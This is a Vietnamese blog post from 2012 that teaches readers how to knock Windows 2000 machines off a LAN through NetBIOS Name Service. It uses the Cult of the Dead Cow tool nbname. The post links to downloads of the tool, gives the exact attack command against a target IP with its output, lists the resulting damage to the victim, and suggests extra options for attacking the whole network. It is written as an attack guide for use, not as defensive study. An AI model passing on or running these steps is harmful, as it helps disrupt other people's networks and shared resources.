Tấn công DoS trong LAN

Tấn công DoS trong LAN

Từ trước tới giờ chắc các bạn chỉ nghe đến tấn công DoS trên internet , chứ chưa nghe đến DoS trên LAN đâu nhỉ.

Có một tool giúp ta tấn công DoS vào dịch vụ NBNS (Net-BIOS Name Service) trên các máy dùng win2k trong LAN thông qua protocol NetBIOS.

Lưu ý : trước khi dùng tool này , bạn phải ngắt service NetBIOS của protcol TCP/IP để tránh xung đột với service NBNS hiện tại ( coi chừng gậy ông đập lưng ông 😉 ).

Rồi, bây giờ  bạn download nbname tại download.tungxeng.net.ms. Unzip và thử tấn công thằng 192.168.234.222 xem sao (nbname chạy trong DOS):

C:\nbname /astat 192.168.234.222  /conflict

NBName v1.9 – Decodes and displays NetBIOS Name traffic (UDP 137), with options
Copyright 2000: Sir Dystic, Cult of the Dead Cow -:|:- New Hack City
Send complaints, ideas and donations to sd@cultdeadcow.com|sd@newhackcity.net

WinSock v2.0 (v2.2) WinSock 2.0
WinSock status: Running

Bound to port 137 on address 192.168.234.244

Broadcast address 192.168.234.255   Netmask: 255.255.255.0

**** NBSTAT QUERY packet sent to 192.168.234.222

Waiting for packets…

** Received 301 bytes from 192.168.234.222:137 via local net

at Web Jun 20 15:46:12 200

OPCode: QUERY

Flags: Response AuthoratativeAnswer

Answer [0]:

*                  <00>

Node Status Resource Record:

MANDALAY    <00> ACTIVE UNIQUE NOTPERM INCONFLICT NOTDEREGED B-NODE

MANDALAYFS <00> ACTIVE GROUP NOTPERM NOCONFLICT NOTDEREGED B-NODE

**** Name release sent to 192.168.234.222

….

Hậu quả của DoS đối với victim :

1. Kết nối mạng bị trục trặc

2. Làm ngưng các chức năng mạng ( vd chức năng Network Neighborhood)

3. Không dùng được chức năng net send

4. Gặp trục trặc với kết nối domain

5. Không thể truy cập được vào tài nguyên chia sẻ chung

6. Hỏng sevice NetBIOS

7. Dùng  lệnh nbtstat -n sẽ gặp 1 bảng thông báo Conflict như sau :

LAN:
Node IpAddress: [192.168.234.222] Scope Id: []

NetBIOS Local Name Table

Name                        Type              Status
——————————————————————–
MANDALAY     <00> UNIQUE            Conflict
MANDALAYFS  <00> GROUP             Registered
MANDALAYFS  <1C> GROUP             Registered
MANDALAY     <20> UNIQUE            Conflict
MANDALAYFS  <1E> GROUP             Registered
MANDALAY     <1D> UNIQUE            Conflict
….

Bạn có thể tấn công tòan mạng LAN bằng cách thêm các tham số /QUERY , /DENY …

Bạn gõ nbname / ? để tham khảo thêm các tham số kèm theo của nbname.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Link Download nbname: http://www.mediafire.com/download.php?acde9jxrh3u97wf

About securityforall

it, smile, share for people,...

Posted on April 19, 2012, in DoS (DENIAL OF SERVICE). Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: